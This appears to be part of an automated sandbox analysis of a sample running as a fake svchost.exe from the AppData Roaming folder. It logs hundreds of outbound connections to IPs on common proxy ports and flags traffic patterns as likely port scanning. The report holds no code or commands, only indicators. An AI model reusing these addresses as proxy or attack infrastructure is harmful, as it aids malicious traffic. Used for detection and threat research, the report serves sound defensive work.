Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.207.199.80 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 162.240.208.98 43704
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 67.213.210.168 46716
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 61.133.66.69 9002
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 119.13.78.93 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 85.25.177.53 58851
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 5.135.83.214 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.223.239.166 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 142.54.239.1 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.153.154.6 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 149.202.91.219 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 107.181.161.81 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.20.123.164 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 212.237.218.68 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.118.132.180 45449
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 139.129.162.65 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 161.97.163.52 45063
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 189.201.191.75 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 159.65.77.168 8585
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 178.94.231.93 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 41.86.46.112 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 181.143.143.125 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.210.57.243 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 89.249.65.191 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 181.143.143.126 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 14.103.24.20 8000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 92.255.88.219 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 195.78.100.162 3629
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 201.77.96.145 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 192.252.220.89 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 154.236.189.13 1976
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 212.87.255.155 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 162.241.137.197 42350
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 93.180.222.134 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 172.67.69.9 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 5.9.169.87 30000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 192.145.228.212 8081
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.88.57.203 32650
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.28.121.58 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 51.15.132.215 16379
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 185.81.153.162 3389
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.17.213.98 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 89.42.166.163 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.223.239.190 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 177.93.44.53 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 185.238.228.240 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 192.169.214.249 45108
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.69.90.57 8081
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 213.21.56.20 4153
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 195.178.33.86 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 47.243.114.192 8180
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 41.60.232.18 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 142.93.196.242 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 79.110.196.145 8081
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 98.162.25.29 31679
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 146.83.118.9 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 36.89.10.51 44268
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 121.101.135.46 8089
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 47.90.126.78 8118
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 146.59.2.183 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 185.194.11.180 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.128.133.239 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 51.161.99.114 48235
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 70.166.167.55 57745
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 132.148.16.169 11320
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 185.220.174.99 59967
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 190.4.58.22 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 212.112.125.44 45555
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 80.191.169.69 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 222.255.238.159 443
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 185.49.31.207 8081
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 51.158.77.220 16379
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 114.106.137.152 8089
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.24.136.68 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 128.140.26.12 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 162.214.225.223 43435
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 51.222.241.8 36219
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 171.228.159.253 5307
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 43.231.22.229 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 80.228.235.6 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 18.134.236.231 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 119.196.168.183 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 184.178.172.5 15303
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.238.12.4 3128	Jump to behavior
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.140.189.95 29003
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 83.143.24.66 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.160.207.49 32650
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 68.71.254.6 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 13.81.217.201 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.35.189.217 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 112.196.112.243 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.222.245.41 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 94.45.74.60 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.25.167.88 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 201.71.3.60 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 163.172.147.89 16379
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 13.232.245.132 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.117.109.9 4153
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 41.217.220.214 32650
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.62.235.18 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.105.228.66 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.117.109.5 4153
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 159.65.39.234 7732
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 110.164.175.110 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.223.246.226 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 202.162.219.10 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 198.101.13.111 25543
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 66.70.197.196 8050
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.21.85.109 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 172.67.181.197 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 202.144.134.150 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 155.185.15.56 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 154.205.152.96 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 5.78.44.6 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 91.222.198.125 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 94.131.63.120 58378
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 54.36.122.16 29796
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 202.159.19.213 443
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 47.111.179.60 8877
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 86.110.189.118 42539
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 201.168.8.74 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 162.241.50.179 40179
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 142.54.228.193 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 178.207.8.20 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.207.199.87 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 20.169.221.14 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 47.94.83.254 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 27.123.3.141 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 43.157.50.206 443
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.249.78.25 83
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 200.108.197.2 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 177.8.113.61 50297
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 27.112.70.59 1111
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 201.182.251.142 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 165.227.196.37 63637
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 3.9.71.167 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 194.163.159.94 35081
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 51.158.124.167 16379
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 185.118.153.110 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.217.226.43 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 125.25.40.38 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.217.226.44 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 51.15.133.214 16379
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 88.255.102.114 1082
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.217.226.45 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.125.240.237 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 45.12.31.3 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 202.159.60.65 443
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.169.254.185 2068
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 47.57.115.226 9050
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 204.48.31.203 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 37.187.141.160 2604
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 162.19.7.53 17979
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 201.251.155.253 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 51.81.186.179 58630
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.35.111.101 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 52.13.248.29 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 155.50.209.50 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 2.229.249.153 4145
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 115.127.2.230 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 18.135.211.182 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 111.224.11.180 8089
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.174.145.12 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 176.8.230.197 8187
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 35.182.11.156 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 104.17.16.87 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 51.158.72.165 16379
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 170.82.231.253 4153
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 213.151.79.84 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 173.212.240.168 46664
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 51.210.127.15 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 113.252.44.133 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.174.145.11 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 103.85.103.129 5678
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 31.7.65.18 443
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 162.19.7.61 49319
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.217.226.40 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 50.217.226.42 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 170.239.207.241 999
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 88.210.20.144 20000
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 201.157.254.26 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 195.138.73.54 44017
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 200.54.22.74 8080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 51.250.13.88 80
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 65.1.40.47 1080
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 47.243.205.1 3128
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 218.145.131.182 443
Source: C:\Users\user\AppData\Roaming\svchost.exe	Network Connect: 43.228.213.24 3128

Connects to many IPs within the same subnet mask (likely port scanning)

Source: global traffic	TCP traffic: Count: 10 IPs: 197.234.13.14,197.234.13.24,197.234.13.57,197.234.13.27,197.234.13.97,197.234.13.45,197.234.13.55,197.234.13.44,197.234.13.5,197.234.13.52
Source: global traffic	TCP traffic: Count: 10 IPs: 184.178.172.13,184.178.172.23,184.178.172.26,184.178.172.14,184.178.172.25,184.178.172.28,184.178.172.17,184.178.172.5,184.178.172.18,184.178.172.11

Connects to many ports of the same IP (likely port scanning)

Source: global traffic	TCP traffic: 103.216.51.36 ports 0,2,3,32650,5,6
Source: global traffic	TCP traffic: 13.234.24.116 ports 1080,1,2,3,3128,8
Source: global traffic	TCP traffic: 46.17.63.166 ports 4154,9480,0,1,9091,10000,4444,9,16379
Source: global traffic	TCP traffic: 62.171.131.101 ports 41055,25847,3,4,7,37447,1629
Source: global traffic	TCP traffic: 45.11.95.166 ports 6010,6012,6003,6014,6002,6005,6016,6015,6004,0,3,6,6009,6008
Source: global traffic	TCP traffic: 45.11.95.165 ports 5031,5021,5044,5000,6014,6035,6002,5003,5047,5037,5026,0,4,5,5214,6039,5018,5019,5219
Source: global traffic	TCP traffic: 207.180.234.220 ports 42692,47476,36946,2,4,6,9,30507,37736
Source: global traffic	TCP traffic: 188.163.170.130 ports 41209,0,1,2,4,9
Source: global traffic	TCP traffic: 164.92.86.113 ports 64110,54093,62987,57391,55651,2,57552,6,7,54597,8,9,50564,60283
Source: global traffic	TCP traffic: 43.131.248.165 ports 15673,1,3,5,6,7
Source: global traffic	TCP traffic: 162.214.102.195 ports 0,34227,3,58994,5,6,60891,50366
Source: global traffic	TCP traffic: 203.96.177.211 ports 33382,2,3,55005,8,15901
Source: global traffic	TCP traffic: 107.180.88.173 ports 3,4,53312,5,35774,7
Source: global traffic	TCP traffic: 166.62.38.100 ports 6322,56191,54083,0,3,4,5,2453,8
Source: global traffic	TCP traffic: 92.205.110.47 ports 17158,19600,1,3,14936,4,6,9
Source: global traffic	TCP traffic: 46.253.143.144 ports 1080,1,2,3,3128,8
Source: global traffic	TCP traffic: 162.241.6.97 ports 63360,44607,59991,45629,1,31794,5,50563,60651,9
Source: global traffic	TCP traffic: 162.241.158.204 ports 63360,44607,59991,0,31794,2,5,52980,50563,60651,8,9
Source: global traffic	TCP traffic: 37.187.77.58 ports 64494,49507,14470,21861,59870,0,52593,3139,4,5,7,9,13412,18936,13574,37920,19767,29380
Source: global traffic	TCP traffic: 92.204.135.37 ports 16591,26927,63462,8623,22942,62969,2,58604,3,4,5,20491,51229,32524,33899,34824
Source: global traffic	TCP traffic: 110.49.34.126 ports 0,2,3,32650,5,6
Source: global traffic	TCP traffic: 41.217.223.145 ports 0,2,3,32650,5,6
Source: global traffic	TCP traffic: 198.57.195.42 ports 38242,1,6,7,8,9,17986
Source: global traffic	TCP traffic: 72.10.160.90 ports 8011,25257,25763,29129,25985,2789,27451,2,28389,5,25087,7
Source: global traffic	TCP traffic: 178.33.163.156 ports 24156,0,2,3,4,8,42380
Source: global traffic	TCP traffic: 72.10.160.170 ports 21687,5385,8881,4583,0,1,1205,2,5,22173,1911,9949
Source: global traffic	TCP traffic: 130.255.162.199 ports 44234,44740,2,3,4,52039
Source: global traffic	TCP traffic: 62.182.114.164 ports 2,3,5,6,59623,9
Source: global traffic	TCP traffic: 51.222.241.157 ports 40351,22538,44029,51718,27206,5717,1,5,30011,7,2563,46286
Source: global traffic	TCP traffic: 128.199.221.91 ports 7176,17532,8004,33383,1,58108,6,7,50223
Source: global traffic	TCP traffic: 162.55.26.132 ports 31280,0,1,2,3,8
Source: global traffic	TCP traffic: 191.103.219.225 ports 48612,1,2,4,6,8
Source: global traffic	TCP traffic: 51.89.16.111 ports 49528,2,4,5,8,9
Source: global traffic	TCP traffic: 195.177.217.131 ports 22842,58053,2,5,8,52858
Source: global traffic	TCP traffic: 161.97.173.42 ports 62289,2,6,52463,59799,8,9,60693,53948,27172
Source: global traffic	TCP traffic: 185.109.184.150 ports 0,63819,56067,5,6,54565,7
Source: global traffic	TCP traffic: 103.149.194.40 ports 0,2,3,32650,5,6
Source: global traffic	TCP traffic: 91.108.130.111 ports 0,2,3,32650,5,6
Source: global traffic	TCP traffic: 37.187.91.192 ports 21981,27898,1,2,7,11721
Source: global traffic	TCP traffic: 162.214.227.68 ports 45540,34071,55392,0,3,4,60433,6,56796,31825,37976,52208
Source: global traffic	TCP traffic: 148.72.206.84 ports 2536,2,3,14815,5,6,34761
Source: global traffic	TCP traffic: 207.180.198.241 ports 37443,25279,27666,57327,3,4,60148,7,55823,13168,17228,37209
Source: global traffic	TCP traffic: 161.97.163.52 ports 9045,26358,45725,32092,64109,0,31125,4,22040,5,9,45063
Source: global traffic	TCP traffic: 162.241.137.197 ports 42350,40604,0,4,6,60200,36534,61041
Source: global traffic	TCP traffic: 103.88.57.203 ports 0,2,3,32650,5,6
Source: global traffic	TCP traffic: 51.15.132.215 ports 1,3,6,7,9,16379
Source: global traffic	TCP traffic: 51.161.99.114 ports 48235,29758,2,5,7,8,9
Source: global traffic	TCP traffic: 132.148.16.169 ports 41824,0,1,2,3,11320
Source: global traffic	TCP traffic: 51.158.77.220 ports 1,3,6,7,9,16379
Source: global traffic	TCP traffic: 162.214.225.223 ports 37581,43435,54917,48414,63452,43265,49556,34071,49806,58240,0,4,6,31473,8,9,50753
Source: global traffic	TCP traffic: 51.222.241.8 ports 36219,1,2,62916,3,6,9
Source: global traffic	TCP traffic: 163.172.147.89 ports 1,3,6,7,9,16379
Source: global traffic	TCP traffic: 41.217.220.214 ports 0,2,3,32650,5,6
Source: global traffic	TCP traffic: 54.36.122.16 ports 44587,17188,2,6,29796,7,9,39713
Source: global traffic	TCP traffic: 177.8.113.61 ports 0,2,50297,5,7,9
Source: global traffic	TCP traffic: 165.227.196.37 ports 53718,63399,63637,61899,3,6,7
Source: global traffic	TCP traffic: 51.158.124.167 ports 1,3,6,7,9,16379
Source: global traffic	TCP traffic: 51.15.133.214 ports 1,3,6,7,9,16379
Source: global traffic	TCP traffic: 51.81.186.179 ports 0,3,5,58630,6,8,51405
Source: global traffic	TCP traffic: 195.138.73.54 ports 44017,0,1,31145,4,7
Source: global traffic	TCP traffic: 146.59.18.246 ports 15860,40975,0,30673,29066,4,5,7,9,49871
Source: global traffic	TCP traffic: 92.204.135.203 ports 0,1,2,10824,4,29212,8
Source: global traffic	TCP traffic: 50.63.12.33 ports 9367,23859,45134,61464,1,34644,3,25492,14738,31785,4,50781,5,22450,58507,52814,30920
Source: global traffic	TCP traffic: 51.15.230.100 ports 1,3,6,7,9,16379
Source: global traffic	TCP traffic: 162.240.72.139 ports 20614,47418,0,1,2,25591,4,6,37445
Source: global traffic	TCP traffic: 51.89.173.40 ports 17982,27887,3100,44719,23313,23854,20435,30199,2,3,55198,4,60775,5,8,51511,11058,31724
Source: global traffic	TCP traffic: 163.172.169.27 ports 1,3,6,7,9,16379
Source: global traffic	TCP traffic: 159.223.71.71 ports 49922,59243,59098,54370,1,60512,59159,61818,52542,5,51187,6,51213,64193,51616
Source: global traffic	TCP traffic: 162.241.66.135 ports 40604,3,4,34455,36829,5,51535
Source: global traffic	TCP traffic: 146.59.70.29 ports 2,3,5,52276,9,37665,32953
Source: global traffic	TCP traffic: 114.108.177.104 ports 0,4,60984,6,8,9
Source: global traffic	TCP traffic: 203.188.245.98 ports 2,3,5,7,8,52837
Source: global traffic	TCP traffic: 43.155.130.182 ports 15673,1,3,5,6,7
Source: global traffic	TCP traffic: 162.240.231.211 ports 41166,62109,0,1,60415,2,60589,6,35541,9
Source: global traffic	TCP traffic: 20.205.61.143 ports 8123,1,2,3,8,80
Source: global traffic	TCP traffic: 138.68.155.22 ports 44660,1,11712,2,3467,7,10760,19987
Source: global traffic	TCP traffic: 45.55.196.194 ports 0,3,60743,4,6,7
Source: global traffic	TCP traffic: 162.241.46.40 ports 64353,41442,62244,49401,56241,34172,0,1,4,9,46097
Source: global traffic	TCP traffic: 199.85.209.166 ports 29657,2,5,6,7,9
Source: global traffic	TCP traffic: 163.172.144.132 ports 1,3,6,7,9,16379
Source: global traffic	TCP traffic: 66.228.35.209 ports 14321,23344,56560,1,2,3,4
Source: global traffic	TCP traffic: 45.117.179.179 ports 6522,14791,27836,1932,2,35942,5,6,17827,18701
Source: global traffic	TCP traffic: 50.62.134.139 ports 1,62607,3,36916,2655,6,9
Source: global traffic	TCP traffic: 163.172.165.36 ports 1,3,6,7,9,16379
Source: global traffic	TCP traffic: 165.22.98.229 ports 43433,44253,45751,44537,3,4
Source: global traffic	TCP traffic: 165.227.104.122 ports 41443,29992,3,5,8,9,58839
Source: global traffic	TCP traffic: 73.151.59.35 ports 20816,0,1,2,6,8
Source: global traffic	TCP traffic: 181.129.183.19 ports 53281,1,2,3,5,8
Source: global traffic	TCP traffic: 164.68.107.253 ports 1,2,4,7,8,48172
Source: global traffic	TCP traffic: 94.23.220.136 ports 43751,25256,40767,1,59415,3,4,5,7,35805,19547
Source: global traffic	TCP traffic: 162.241.46.6 ports 64353,62592,41442,61579,1,53477,5,6,7,9
Source: global traffic	TCP traffic: 66.228.37.252 ports 46695,7841,24360,4,5,6,9
Source: global traffic	TCP traffic: 147.124.212.31 ports 11070,4671,13276,30508,3,24230,6,7,9,30479,36779
Source: global traffic	TCP traffic: 8.219.177.134 ports 15673,1,3,5,6,7
Source: global traffic	TCP traffic: 104.238.111.107 ports 5484,21453,5452,45883,3230,0,2,28394,3,60214,36049,8968,37963,7999
Source: global traffic	TCP traffic: 43.255.113.232 ports 8083,8081,8084,0,1,8,80,84,85
Source: global traffic	TCP traffic: 197.234.13.52 ports 0,36902,2,3,6,9
Source: global traffic	TCP traffic: 82.113.157.122 ports 31280,0,1,2,3,8
Source: global traffic	TCP traffic: 162.240.10.35 ports 0,3,4,5,6,50463
Source: global traffic	TCP traffic: 107.180.103.214 ports 45870,61634,1,3,4,6
Source: global traffic	TCP traffic: 194.233.78.142 ports 35760,34471,41119,1,35513,3,4,7
Source: global traffic	TCP traffic: 37.120.162.180 ports 0,2,3,4,7,42370
Source: global traffic	TCP traffic: 92.204.134.38 ports 25825,52929,9375,15393,7785,42571,25675,29718,1555,55425,56177,5,54467,28695,7,51123,8,30747,59727
Source: global traffic	TCP traffic: 88.202.230.103 ports 8896,17045,3,13638,4,6,7,9,39647
Source: global traffic	TCP traffic: 185.158.114.14 ports 25697,2,5,6,7,9
Source: global traffic	TCP traffic: 162.210.192.135 ports 23674,2,3,4,6,7
Source: global traffic	TCP traffic: 43.131.242.162 ports 15673,1,3,5,6,7
Source: global traffic	TCP traffic: 37.44.238.2 ports 1,53471,3,4,5,7
Source: global traffic	TCP traffic: 67.43.227.228 ports 6133,13077,8323,9039,24431,1,3,6
Source: global traffic	TCP traffic: 67.43.227.227 ports 15383,8149,12261,16155,1099,2251,22269,0,4607,2843,14947,12879,1489,4,6,7,4479,15885,14505,1615
Source: global traffic	TCP traffic: 67.43.227.226 ports 6133,1,2,3,6,7,30999,12673
Source: global traffic	TCP traffic: 94.247.241.70 ports 0,3,4,5,6,53640,51006
Source: global traffic	TCP traffic: 51.79.87.144 ports 41230,8533,22500,41746,0,30464,1,2,3,54395,4
Source: global traffic	TCP traffic: 75.119.145.154 ports 28633,0,25084,5,7,7505,15779
Source: global traffic	TCP traffic: 67.43.227.230 ports 5097,23685,0,5,7,9
Source: global traffic	TCP traffic: 46.175.4.76 ports 39574,3,4,5,7,9
Source: global traffic	TCP traffic: 67.43.228.253 ports 4671,7379,21649,21219,26955,2193,1,2,14869,3,9,1729
Source: global traffic	TCP traffic: 132.148.20.70 ports 0,1,4,5,8,18504
Source: global traffic	TCP traffic: 164.92.237.188 ports 63373,63722,2,3,6,7,52306
Source: global traffic	TCP traffic: 107.180.101.226 ports 37150,0,1,3,5,7
Source: global traffic	TCP traffic: 62.171.169.37 ports 0,2,4,5,58402,8
Source: global traffic	TCP traffic: 92.204.136.149 ports 16691,1,16928,6,9,18629
Source: global traffic	TCP traffic: 148.72.209.174 ports 38088,62572,1,64938,2,4,6,39458,4734,12446
Source: global traffic	TCP traffic: 50.63.12.101 ports 6095,32423,2,2953,3,10647,5,9,17559
Source: global traffic	TCP traffic: 198.12.255.193 ports 9375,22785,53281,1,2,28763,6,8,6821,51612,32216
Source: global traffic	TCP traffic: 209.222.97.30 ports 19481,62543,1,15805,4,8,9
Source: global traffic	TCP traffic: 8.213.128.6 ports 1,2,3,3128,443,50001,8,8019
Source: global traffic	TCP traffic: 51.161.131.84 ports 63055,25843,58612,2,3,4,5,8,49202
Source: global traffic	TCP traffic: 157.185.157.151 ports 26589,2,5,6,8,9
Source: global traffic	TCP traffic: 117.160.250.163 ports 8080,8081,9990,2,8,80,81,82,9999,8828
Source: global traffic	TCP traffic: 51.75.126.150 ports 19693,36694,21803,64615,2,3,11802,35632,5,6,34144,4228,37847
Source: global traffic	TCP traffic: 211.222.252.187 ports 8193,8197,1,3,8,80,9
Source: global traffic	TCP traffic: 54.38.176.200 ports 26591,3,6,7,9,3679
